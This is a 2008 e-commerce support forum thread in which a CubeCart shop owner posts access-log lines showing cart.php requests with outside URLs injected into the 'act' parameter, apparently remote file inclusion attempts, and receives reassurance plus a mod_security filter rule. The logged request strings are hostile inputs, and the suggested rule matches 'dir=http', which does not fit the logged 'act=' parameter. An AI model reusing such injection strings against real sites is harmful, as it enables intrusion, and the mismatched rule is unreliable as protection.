Jump to content

Have I Been Hacked?

Guest miraclematt

By Guest miraclematt
in Technical Help

 Share

Recommended Posts

Guest miraclematt

Guest miraclematt

Posted
Posted

checking my stats i have the following:

22. Guest /store/index.php?act=viewProd&productId=115 Feb 01 2008, 11:46 AM Feb 01 2008, 11:46 AM 0.00 Mins

23. Guest /store/cart.php?act=http://sahel55.com/articles/omaduro/kimumid/ Feb 01 2008, 11:46 AM Feb 01 2008, 11:46 AM 0.00 Mins

24. Guest /store/cart.php?act=http://www.feliciano.de/Webgalerie/bilder/Italy/une/yiwul/ Feb 01 2008, 11:46 AM Feb 01 2008, 11:46 AM 0.00 Mins

25. Guest /store/cart.php?act=http://www.electrofed.com/_app/efc/odoqu/ferus/

this is the first time i have seen url's in the cart!! has my site been hacked??

i did submit through one of those searchengines submitter the other day, could it be due to this??

please advise and also what do i need to do if i have been?? my site seems fine and no odd folders/programmes etc on my computer.

many many thanks Helen

Link to comment
Share on other sites

Guest EverythingWeb

Guest EverythingWeb

Posted
Posted

I have tested this hack *attempt* and there is nothing to worry about, as the security in CubeCart handles it well (by just kicking it out) and returning to the main index.php

CubeCart 3.0.17 was Security Auditted and there have been no known vulnerabilities in it. You're safe. :D

Link to comment
Share on other sites
Guest miraclematt

Guest miraclematt

Posted
Posted

also we get a lot of 'taf' on prod 21 - ie sometimes 20 at a time all for 4/5 secs - be nice to think someone is promoting our items but think maybe not. it is set up to put in security no so i would think that it is safe - am i?? it is just as it is the same product all the time!!! many thanks helen

Link to comment
Share on other sites
Guest EverythingWeb

Guest EverythingWeb

Posted
Posted

That's them *trying* to use Tell a Friend to send mass-emails.

Make sure you've got capture enabled to prevent spam-bots using your TAF forms :D

Link to comment
Share on other sites
Guest rebelo

Guest rebelo

Posted
Posted

checking my stats i have the following:

22. Guest /store/index.php?act=viewProd&productId=115 Feb 01 2008, 11:46 AM Feb 01 2008, 11:46 AM 0.00 Mins

23. Guest /store/cart.php?act=http://sahel55.com/articles/omaduro/kimumid/ Feb 01 2008, 11:46 AM Feb 01 2008, 11:46 AM 0.00 Mins

24. Guest /store/cart.php?act=http://www.feliciano.de/Webgalerie/bilder/Italy/une/yiwul/ Feb 01 2008, 11:46 AM Feb 01 2008, 11:46 AM 0.00 Mins

25. Guest /store/cart.php?act=http://www.electrofed.com/_app/efc/odoqu/ferus/

this is the first time i have seen url's in the cart!! has my site been hacked??

i did submit through one of those searchengines submitter the other day, could it be due to this??

please advise and also what do i need to do if i have been?? my site seems fine and no odd folders/programmes etc on my computer.

many many thanks Helen

If You are running, as admin, Apache with mod security v1 adding the following rule to your modsec.conf will

give them a 406(or whatever error You choose).

SecFilterSelective THE_REQUEST "dir=http"

Link to comment
Share on other sites
Guest miraclematt

Guest miraclematt

Posted
Posted

hiya, many thanks but you have lost me. cant find that file, i am ok at following instructions but no real idea about scrpting. the admin i use is the cuecart admin and says sec is apache but no idea for rest!! sorry to be dumb!! kind regards and thank you helen

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...